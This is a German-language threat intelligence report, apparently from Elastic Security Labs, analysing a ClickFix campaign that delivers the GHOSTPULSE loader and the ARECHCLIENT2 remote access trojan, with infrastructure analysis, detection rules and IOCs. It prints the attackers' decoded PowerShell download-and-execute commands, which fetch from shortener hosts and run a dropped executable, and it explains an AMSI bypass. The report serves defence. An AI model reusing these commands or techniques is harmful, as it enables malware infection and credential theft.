Präambel
Elastic Security Labs hat beobachtet, dass die ClickFix-Technik für mehrstufige Kampagnen immer beliebter wird, bei denen verschiedene Malware durch Social-Engineering-Taktiken verbreitet wird.
Unsere Threat Intelligence deutet auf einen erheblichen Anstieg der Aktivitäten hin, bei denen ClickFix (die zuerst beobachtete Technik) als primären Erstzugriffsvektor genutzt wird. Diese Social-Engineering-Technik verleitet Benutzer dazu, bösartige PowerShell zu kopieren und einzufügen, was zur Ausführung von Malware führt. Unsere Telemetrie verfolgt die Nutzung seit letztem Jahr, einschließlich der Fälle, die zur Bereitstellung neuer Versionen des GHOSTPULSE-Loaders geführt haben. Dies führte zu Kampagnen, die sich an ein breites Publikum richteten, indem sie Malware und Infostealer wie LUMMA und ARECHCLIENT2 verwendeten, eine Familie, die erstmals im 2019 beobachtet wurde, aber jetzt einen deutlichen Anstieg der Popularität erlebt.
Dieser Beitrag befasst sich mit einer kürzlich durchgeführten ClickFix-Kampagne und bietet eine eingehende Analyse ihrer Komponenten, der verwendeten Techniken und der Malware, die sie letztendlich liefert.
Wichtigste Erkenntnisse
- ClickFix: Bleibt eine hocheffektive und weit verbreitete Methode für den Erstzugriff.
- GEISTERPULS: Er wird weiterhin häufig als mehrstufiger Nutzlastlader eingesetzt und wird mit neuen Modulen und verbesserten Ausweichtechniken weiterentwickelt. Bemerkenswert ist, dass die Erstkonfiguration in einer verschlüsselten Datei geliefert wird.
- ARECHCLIENT2 (SECTOPRAT): Hat im Laufe des Jahres 2025 einen erheblichen Anstieg böswilliger Aktivitäten verzeichnet.
Der erste Aufhänger: Dekonstruktion des Social Engineering von ClickFix
Jeder erfolgreiche mehrstufige Angriff beginnt mit einem Halt, und in vielen der letzten Kampagnen wurde dieser erste Schritt von ClickFix erfüllt. ClickFix nutzt die menschliche Psychologie und verwandelt scheinbar harmlose Benutzerinteraktionen in die Startrampe für Kompromittierungen.
Im Kern handelt es sich bei ClickFix um eine Social-Engineering-Technik, die darauf abzielt, Benutzer so zu manipulieren, dass sie versehentlich bösartigen Code auf ihren Systemen ausführen. Es macht sich gängige Online-Verhaltensweisen und psychologische Tendenzen zunutze und präsentiert den Nutzern irreführende Eingabeaufforderungen – oft getarnt als Browser-Updates, Systemfehler oder sogar CAPTCHA-Verifizierungen. Der Trick ist einfach, aber unglaublich effektiv: Anstelle eines direkten Downloads wird der Benutzer angewiesen, einen scheinbar harmlosen "Fix" (bei dem es sich um einen bösartigen PowerShell-Befehl handelt) zu kopieren und direkt in den Ausführen-Dialog seines Betriebssystems einzufügen. Diese scheinbar freiwillige Aktion umgeht viele herkömmliche Perimeterverteidigungen, da der Benutzer den Prozess initiiert.
ClickFix tauchte erstmals im März 2024 in der Bedrohungslandschaft auf, hat aber schnell an Zugkraft gewonnen, ist im Laufe des 2024 explodiert und setzt seinen aggressiven Aufstieg bis 2025 fort. Seine Wirksamkeit liegt in der Ausnutzung der "Verifizierungsmüdigkeit" – der unbewussten Gewohnheit der Nutzer, sich gedankenlos durch Sicherheitsüberprüfungen zu klicken. Wenn sie mit einem vertraut aussehenden CAPTCHA oder einem dringenden "Fix it"-Button konfrontiert werden, fügen sich viele Benutzer, konditioniert durch Routine, einfach, ohne die zugrunde liegende Anfrage zu hinterfragen. Dies macht ClickFix zu einem unglaublich potenten Erstzugriffsvektor, der von einem breiten Spektrum von Bedrohungsakteuren aufgrund seiner hohen Erfolgsquote beim Knacken der anfänglichen Abwehrmaßnahmen bevorzugt wird.
Unsere jüngste Elastic Security-Studie zu EDDIESTEALER ist ein weiteres konkretes Beispiel für die Wirksamkeit von ClickFix bei der Erleichterung der Bereitstellung von Malware und unterstreicht seine Vielseitigkeit und breite Akzeptanz in der Bedrohungslandschaft.
Unsere interne Telemetrie bei Elastic bestätigt diesen Trend und zeigt ein erhebliches Volumen an ClickFix-bezogenen Warnmeldungen in unseren beobachteten Umgebungen, insbesondere im 1. Quartal 2025. Wir haben einen Anstieg der Versuche im Vergleich zum Vorquartal festgestellt, wobei der Schwerpunkt hauptsächlich auf der Bereitstellung von Masseninfektions-Malware wie RATs und InfoStealern liegt.
Der Weg einer ClickFix-Kampagne zur ARECHCLIENT2
Die ClickFix-Technik dient oft als erster Schritt in einem größeren, mehrstufigen Angriff. Wir haben kürzlich eine Kampagne analysiert, die diese Entwicklung deutlich zeigt. Dieser Vorgang beginnt mit einem ClickFix-Köder , der Benutzer dazu verleitet, den Infektionsprozess zu starten. Nach dem ersten Zugriff stellt die Kampagne eine aktualisierte Version des GHOSTPULSE Loaders (auch bekannt als HIJACKLOADER, IDATLOADER) bereit. Dieser Loader bringt dann einen .NET-Zwischenloader ein. Diese zusätzliche Stufe ist für die Bereitstellung der endgültigen Nutzlast verantwortlich: eine ARECHCLIENT2 (SECTOPRAT)-Probe, die direkt in den Speicher geladen wird. Diese spezielle Angriffskette zeigt, wie Angreifer Social Engineering mit versteckten Loader-Funktionen und mehreren Ausführungsschichten kombinieren, um Daten zu stehlen und letztendlich die Fernkontrolle zu erlangen.
Wir haben genau diese Kampagne in unserer Telemetrie am beobachtet, was uns einen direkten Einblick in die reale Ausführung und die Reihenfolge ihrer Komponenten gibt.
Technische Analyse der Infektion
Die Infektionskette beginnt mit einer Phishing-Seite, die eine Cloudflare-Anti-DDoS-Captcha-Verifizierung imitiert.
Wir haben zwei Infrastrukturen (beide in 50.57.243[.]90aufgelöst) https://clients[.]dealeronlinemarketing[[.]]com/captcha/ und https://clients[.]contology[.]com/captcha/ beobachtet, die dieselbe anfängliche Nutzlast liefern.
Die Benutzerinteraktion auf dieser Seite initiiert die Ausführung. GHOSTPULSE dient in dieser Kampagne als Malware-Loader. Elastic Security Labs hat diesen Loader genau verfolgt, und unsere früheren Untersuchungen (2023 und 2024) gaben einen detaillierten Einblick in seine anfänglichen Fähigkeiten.
Bei der Webseite handelt es sich um ein stark verschleiertes JavaScript-Skript, das den HTML-Code und JavaScript generiert, das einen PowerShell-Befehl in die Zwischenablage kopiert.
Wenn wir den Laufzeit-HTML-Code in einem Browser überprüfen, können wir das Frontend der Seite sehen, aber nicht das Skript, das nach dem Klicken auf das Kontrollkästchen ausgeführt wird Verify you are human.
Eine einfache Lösung besteht darin, es in einem Debugger auszuführen, um die Informationen während der Ausführung abzurufen. Der zweite JS-Code ist verschleiert, aber wir können leicht zwei interessante Funktionen identifizieren. Die erste Funktion, runClickedCheckboxEffects, ruft die öffentliche IP-Adresse des Computers ab, indem sie https://api.ipify[.]org?format=json, abfragt und dann die IP-Adresse an die Infrastruktur des Angreifers sendet, https://koonenmagaziner[.]click/counter/<IP_address>, die Infektion zu protokollieren.
Die zweite Funktion kopiert einen base64-codierten PowerShell-Befehl in die Zwischenablage.
Dies ist das Folgende, wenn es base64-dekodiert ist
(Invoke-webrequest -URI 'https://shorter[.]me/XOWyT'
-UseBasicParsing).content | iexBei der Ausführung wird das folgende PowerShell-Skript abgerufen:
Invoke-WebRequest -Uri "https://bitly[.]cx/iddD" -OutFile
"$env:TEMP\ComponentStyle.zip"; Expand-Archive -Path
"$env:TEMP/ComponentStyle.zip" -DestinationPath
"$env:TEMP"; & "$env:TEMP\crystall\Crysta_x86.exe"Der beobachtete Infektionsprozess für diese Kampagne umfasst die Bereitstellung von GHOSTPULSE wie folgt: Nachdem der Benutzer den von ClickFix kopierten PowerShell-Befehl ausgeführt hat, ruft das ursprüngliche Skript zusätzliche Befehle ab und führt sie aus. Diese PowerShell-Befehle laden eine ZIP-Datei (ComponentStyle.zip) von einem Remote-Speicherort herunter und extrahieren sie dann in ein temporäres Verzeichnis auf dem System des Opfers.
Zu den extrahierten Inhalten gehören Komponenten für GHOSTPULSE, insbesondere eine gutartige ausführbare Datei (Crysta_X64.exe) und eine bösartige Dynamic Link Library (DllXDownloadManager.dll). Bei diesem Setup wird DLL-Sideloading verwendet, eine Technik, bei der die legitime ausführbare Datei die schädliche DLL lädt. Die Datei (Heeschamjet.rc) ist die IDAT-Datei , die die Nutzlasten der nächsten Phase in einem verschlüsselten Format enthält
und die Datei Shonomteak.bxi, die verschlüsselt und vom Loader zum Abrufen der Stage- 2 - und Konfigurationsstruktur verwendet wird.
GHOSTPULSE
Phase 1
GHOSTPULSE ist eine Malware, die aus dem Jahr 2023 stammt. Es hat kontinuierlich zahlreiche Updates erhalten, darunter eine neue Möglichkeit, seine verschlüsselte Nutzlast in einem Bild zu speichern, indem die Nutzlast in die Pixel des PNG eingebettet wird, wie im Blogbeitrag 2024 Research von Elastic beschrieben, sowie neue Module aus der Zscaler-Forschung.
Die in dieser Kampagne verwendete Malware wurde mit einer zusätzlichen verschlüsselten Datei namens Shonomteak.bxiausgeliefert. In Phase 1 des Ladeprogramms wird die Datei mithilfe eines DWORD-Additionsvorgangs entschlüsselt, wobei ein Wert in der Datei selbst gespeichert ist.
Die Malware extrahiert dann den Stage- 2 -Code aus der entschlüsselten Datei Shonomteak.bxi und injiziert ihn mit der Funktion LibraryLoadA in eine geladene Bibliothek. Der Bibliotheksname wird in derselben entschlüsselten Datei gespeichert. In unserem Fall ist es vssapi.dll.
Die Funktion stage 2 wird dann mit einem Strukturparameter aufgerufen, der den Dateinamen der IDAT-PNG-Datei, die Stage- 2 -Konfiguration, die sich innerhalb der entschlüsselten Shonomteak.bxi, befand, und ein boolesches Feld enthält, das in unserem Fall auf True gesetzt b_detect_process.
Phase 2
Wenn das boolesche Feld b_detect_process auf True gesetzt ist, führt die Malware eine Funktion aus, die nach einer Liste von Prozessen sucht, um festzustellen, ob sie ausgeführt werden. Wenn ein Prozess erkannt wird, wird die Ausführung um 5 Sekunden verzögert.
In früheren Beispielen haben wir GHOSTPULSE analysiert, dessen Konfiguration direkt in der Binärdatei fest codiert war. Dieses Sample hingegen enthält alle notwendigen Informationen, die für das ordnungsgemäße Funktionieren der Malware erforderlich sind, und die in Shonomteak.bxi, gespeichert sind, darunter:
- Hashes für die DLL-Namen und Windows-APIs
- IDAT-Tag: wird verwendet, um den Anfang der verschlüsselten Daten in der PNG-Datei zu finden
- IDAT-Zeichenfolge: Das ist einfach "IDAT"
- Hashes von Prozessen, nach denen gesucht werden soll
Abschließende Gedanken zu GHOSTPULSE
GHOSTPULSE hat mehrere Updates erhalten. Die Verwendung der IDAT-Header-Methode zum Speichern der verschlüsselten Nutzlast anstelle der neuen Methode, die wir im Jahr 2024 entdeckt haben und bei der Pixel zum Speichern der Nutzlast verwendet werden, könnte darauf hindeuten, dass der Ersteller dieser Familie beide Optionen zum Kompilieren neuer Beispiele beibehalten hat.
Unser Konfigurationsextraktor führt die Nutzlastextraktion mit beiden Methoden durch und kann für die Massenanalyse von Proben verwendet werden. Sie finden das aktualisierte Tool in unserem labs-releases-Repository.
ARECHCLIENT2
Im Jahr 2025 wurde ein deutlicher Anstieg der Aktivitäten im Zusammenhang mit ARECHCLIENT2 (SectopRAT) beobachtet. Dieses stark verschleierte .NET-Fernzugriffstool, das ursprünglich im November 2019 identifiziert wurde und für seine informationsstehlenden Funktionen bekannt ist, wird nun von GHOSTPULSE über die Clickfix-Social-Engineering-Technik bereitgestellt. Unsere früheren Recherchen dokumentierten den ersten Einsatz von GHOSTPULSE unter Verwendung von ARECHCLIENT2 um das Jahr 2023.
Die Nutzlast, die von GHOSTPULSE in einem neu erstellten Prozess bereitgestellt wird, ist ein nativer x86-.NET-Loader, der seinerseits ARECHCLIENT2 lädt.
Der Lader durchläuft 3 Schritte:
- Patchen von AMSI
- Extrahieren und Entschlüsseln der Nutzlast
- Laden der CLR und anschließendes reflektierendes Laden ARECHCLIENT2
Interessanterweise ist die Fehlerbehandlung zu Debugzwecken immer noch vorhanden, z. B. in Form von Meldungsfeldern, die die MessageBoxA -API verwenden, z. B. wenn der Abschnitt .tls nicht gefunden wird, wird ein Fehlermeldungsfeld mit der Zeichenfolge "D1" angezeigt.
Im Folgenden finden Sie eine Tabelle mit allen Fehlermeldungen und ihrer Beschreibung:
| Message | Beschreibung |
|---|---|
| F1 | LoadLibraryExW Hooking fehlgeschlagen |
| F2 | AMSI-Patching fehlgeschlagen |
| D1 | .tls Abschnitt kann nicht gefunden werden |
| W2 | CLR konnte nicht geladen werden |
Die Malware richtet einen Hook auf der LoadLibraryExW -API ein. Dieser Hook wartet darauf, dass amsi.dll geladen wird, und setzt dann einen weiteren Hook auf AmsiScanBuffer 0, wodurch AMSI effektiv umgangen wird.
Danach ruft das Ladeprogramm den Zeiger im Arbeitsspeicher auf den .tls Abschnitt ab, indem es die PE-Header analysiert. Die ersten 0x40 Bytes dieses Abschnitts dienen als XOR-Schlüssel, und die restlichen Bytes enthalten das verschlüsselte ARECHCLIENT2 Beispiel, das dann vom Ladeprogramm entschlüsselt wird.
Schließlich wird die .NET Common Language Runtime (CLR) mit der CLRCreateInstance-Windows-API in den Arbeitsspeicher geladen, bevor ARECHCLIENT2 reflektiert geladen werden. Im Folgenden finden Sie ein Beispiel für die Ausführung.
ARECHCLIENT2 ist ein potenter Remote-Access-Trojaner und Infostealer, der auf ein breites Spektrum sensibler Benutzerdaten und Systeminformationen abzielt. Die Kernziele der Malware konzentrieren sich in erster Linie auf:
- Diebstahl von Anmeldeinformationen und Finanzen: ARECHCLIENT2 zielt explizit auf Kryptowährungs-Wallets, browsergespeicherte Passwörter, Cookies und Autofill-Daten ab. Es zielt auch auf Anmeldeinformationen von FTP, VPN, Telegram, Discord und Steam ab.
- Systemprofilierung und Aufklärung: ARECHCLIENT2 sammelt umfangreiche Systemdetails, einschließlich der Betriebssystemversion, Hardwareinformationen, der IP-Adresse, des Computernamens und der Geolokalisierung (Stadt, Land und Zeitzone).
- Ausführung von Befehlen: ARECHCLIENT2 empfängt und führt Befehle von seinem Command-and-Control-Server (C2) aus, wodurch Angreifer die Fernsteuerung über infizierte Systeme erhalten.
Die ARECHCLIENT2 Malware verbindet sich mit ihrer C2- 144.172.97[.]2, , die in der Binärdatei als verschlüsselte Zeichenfolge fest codiert ist, und ruft auch ihre sekundäre C2-IP (143.110.230[.]167) von einer hartcodierten Pastebin-Link- https://pastebin[.]com/raw/Wg8DHh2xab.
Analyse der Infrastruktur
Die bösartige Captcha-Seite wurde unter zwei Domains gehostet, clients.dealeronlinemarketing[.]com und clients.contology[.]com unter der URI /captcha und /Client , die auf die folgende IP-Adresse verweist 50.57.243[.]90.
Wir haben festgestellt, dass beide Unternehmen mit einer digitalen Werbeagentur verbunden sind, die auf eine lange Betriebsgeschichte zurückblicken kann. Weitere Untersuchungen zeigen, dass das Unternehmen konsequent Client-Subdomains verwendet hat, um verschiedene Inhalte, einschließlich PDFs und Formulare, zu Werbezwecken zu hosten.
Wir gehen davon aus, dass der Angreifer wahrscheinlich den Server 50.57.243[.]90 kompromittiert hat und dies ausnutzt, indem er die vorhandene Infrastruktur und die Werbereichweite des Unternehmens ausnutzt, um weit verbreitete böswillige Aktivitäten zu erleichtern.
Im weiteren Verlauf der Angriffskette ergab die Analyse der ARECHCLIENT2 C2-IPs (143.110.230[.]167 und 144.172.97[.]2) zusätzliche Kampagneninfrastrukturen. Beide Server werden auf unterschiedlichen autonomen Systemen, AS14061 und AS14956 gehostet.
Die Fokussierung auf einen gemeinsam genutzten Banner-Hash (@ValidinLLC HOST-BANNER_0_HASH, der den Hash-Wert der Webserver-Antwortbanner darstellt) ergab 120 in den letzten sieben Monaten einzigartige Server in einer Reihe von autonomen Systemen. Von diesen 120 wurden 19 zuvor von verschiedenen anderen Anbietern als "Sectop RAT" (auch bekannt als ARECHCLIENT2) bezeichnet, wie im Maltrail-Repo dokumentiert.
Die gezielte Validierung der neuesten Vorkommnisse (erstes Auftreten nach dem 1. Juni 2025) gegen VirusTotal zeigt, dass Community-Mitglieder alle 13 zuvor als Sectop RAT C2 gekennzeichnet haben.
Alle diese Server haben ähnliche Konfigurationen:
- Ausführen von Canonical Linux
- SSH an
22 - Unbekanntes TCP an
443 - Nginx HTTP auf
8080und - HTTP auf
9000(C2-Port)
Der Dienst an Port 9000 verfügt über Windows-Server-Header, während sowohl die SSH- als auch die NGINX-HTTP-Dienste Ubuntu als Betriebssystem angeben. Dies deutet auf einen Reverseproxy des C2 hin, um den eigentlichen Server durch Beibehaltung von verwerfbaren Front-End-Redirectors zu schützen.
ARECHCLIENT2 IOC:
HOST-BANNER_0_HASH: 82cddf3a9bff315d8fc708e5f5f85f20
Dies ist eine aktive Kampagne, und diese Infrastruktur wird in den letzten sieben Monaten in hohem Rhythmus auf- und abgebaut. Zum Zeitpunkt der Veröffentlichung sind die folgenden C2-Knoten noch aktiv:
| Value | First Seen | Zuletzt gesehen |
|---|---|---|
66.63.187.22 | 2025-06-15 | 2025-06-15 |
45.94.47.164 | 2025-06-02 | 2025-06-15 |
84.200.17.129 | 2025-06-04 | 2025-06-15 |
82.117.255.225 | 2025-03-14 | 2025-06-15 |
45.77.154.115 | 2025-06-05 | 2025-06-15 |
144.172.94.120 | 2025-05-20 | 2025-06-15 |
79.124.62.10 | 2025-05-15 | 2025-06-15 |
82.117.242.178 | 2025-03-14 | 2025-06-15 |
195.82.147.132 | 2025-04-10 | 2025-06-15 |
62.60.247.154 | 2025-05-18 | 2025-06-15 |
91.199.163.74 | 2025-04-03 | 2025-06-15 |
172.86.72.81 | 2025-03-13 | 2025-06-15 |
107.189.24.67 | 2025-06-02 | 2025-06-15 |
143.110.230.167 | 2025-06-08 | 2025-06-15 |
185.156.72.80 | 2025-05-15 | 2025-06-15 |
85.158.110.179 | 2025-05-11 | 2025-06-15 |
144.172.101.228 | 2025-05-13 | 2025-06-15 |
192.124.178.244 | 2025-06-01 | 2025-06-15 |
107.189.18.56 | 2025-04-27 | 2025-06-15 |
194.87.29.62 | 2025-05-18 | 2025-06-15 |
185.156.72.63 | 2025-06-12 | 2025-06-12 |
193.149.176.31 | 2025-06-08 | 2025-06-12 |
45.141.87.249 | 2025-06-12 | 2025-06-12 |
176.126.163.56 | 2025-05-06 | 2025-06-12 |
185.156.72.71 | 2025-05-15 | 2025-06-12 |
91.184.242.37 | 2025-05-15 | 2025-06-12 |
45.141.86.159 | 2025-05-15 | 2025-06-12 |
67.220.72.124 | 2025-06-05 | 2025-06-12 |
45.118.248.29 | 2025-01-28 | 2025-06-12 |
172.105.148.233 | 2025-06-03 | 2025-06-10 |
194.26.27.10 | 2025-05-06 | 2025-06-10 |
45.141.87.212 | 2025-06-08 | 2025-06-08 |
45.141.86.149 | 2025-05-15 | 2025-06-08 |
172.235.190.176 | 2025-06-08 | 2025-06-08 |
45.141.86.82 | 2024-12-13 | 2025-06-08 |
45.141.87.7 | 2025-05-13 | 2025-06-06 |
185.125.50.140 | 2025-04-06 | 2025-06-03 |
Fazit
Diese mehrstufige Cyber-Kampagne nutzt effektiv ClickFix Social Engineering für den ersten Zugriff, indem der GHOSTPULSE-Loader eingesetzt wird, um einen .NET-Zwischenloader bereitzustellen, der schließlich in der speicherresidenten ARECHCLIENT2-Payload gipfelt. Diese mehrschichtige Angriffskette sammelt umfangreiche Anmeldedaten, Finanz- und Systemdaten und bietet Angreifern gleichzeitig die Möglichkeit, kompromittierte Computer fernzusteuern.
MITRE ATT&CK
Elastic verwendet das MITRE ATT&CK-Framework , um gängige Taktiken, Techniken und Verfahren zu dokumentieren, die von Advanced Persistent Threats gegen Unternehmensnetzwerke eingesetzt werden.
Taktiken
Taktiken stellen das Warum einer Technik oder Untertechnik dar. Es ist das taktische Ziel des Gegners: der Grund für die Ausführung einer Aktion.
Techniken
Techniken stellen dar, wie ein Angreifer ein taktisches Ziel erreicht, indem er eine Aktion ausführt.
- Phishing
- Befehls- und Skript-Interpreter
- DLL-Querladen
- Reflektierendes Laden
- Benutzerinteraktion
- Übergabe von Eingangswerkzeugen
- Erkennung von Systeminformationen
- Prozess-Erkennung
- Web-Session-Cookie stehlen
Erkennen von [Malware]
Erkennung
Elastic Defend erkennt diese Bedrohung mit den folgenden Verhaltensschutzregeln:
- Verdächtige Ausführung der Befehlsshell über Windows Run
- DNS-Abfrage an verdächtige Top-Level-Domain
- Laden der Bibliothek einer Datei, die von einem signierten binären Proxy geschrieben wurde
- Verbindung zum WebService über einen signierten binären Proxy
- Potenzielle Erkennung von Browserinformationen
YARA
Beobachtungen
Die folgenden Observablen wurden in dieser Studie diskutiert.
| Überwachbar | Typ | Name | Referenz |
|---|---|---|---|
clients.dealeronlinemarketing[.]com | Domain | Captcha-Subdomain | |
clients.contology[.]com | Domain | Captcha-Subdomain | |
koonenmagaziner[.]click | Domain | ||
50.57.243[.]90 | IPv4-ADDR | clients.dealeronlinemarketing[.]com & clients.contology[.]com IP-Adresse | |
144.172.97[.]2 | IPv4-ADDR | ARECHCLIENT2 C&C-Server | |
143.110.230[.]167 | IPv4-ADDR | ARECHCLIENT2 C&C-Server | |
pastebin[.]com/raw/Wg8DHh2x | IPv4-ADDR | Enthält ARECHCLIENT2 IP des C&C-Servers | |
2ec47cbe6d03e6bdcccc63c936d1c8310c261755ae5485295fecac4836d7e56a | SHA-256 | DivXDownloadManager.dll | GHOSTPULSE |
a8ba1e14249cdd9d806ef2d56bedd5fb09de920b6f78082d1af3634f4c136b90 | SHA-256 | Heeschamjiet.rc | PNG GHOSTPULSE |
f92b491d63bb77ed3b4c7741c8c15bdb7c44409f1f850c08dce170f5c8712d55 | SHA-256 | DOTNET-LADER | |
4dc5ba5014628ad0c85f6e8903de4dd3b49fed65796978988df8c128ba7e7de9 | SHA-256 | ARECHCLIENT2 |
Referenzen
In der obigen Studie wurde auf Folgendes Bezug genommen: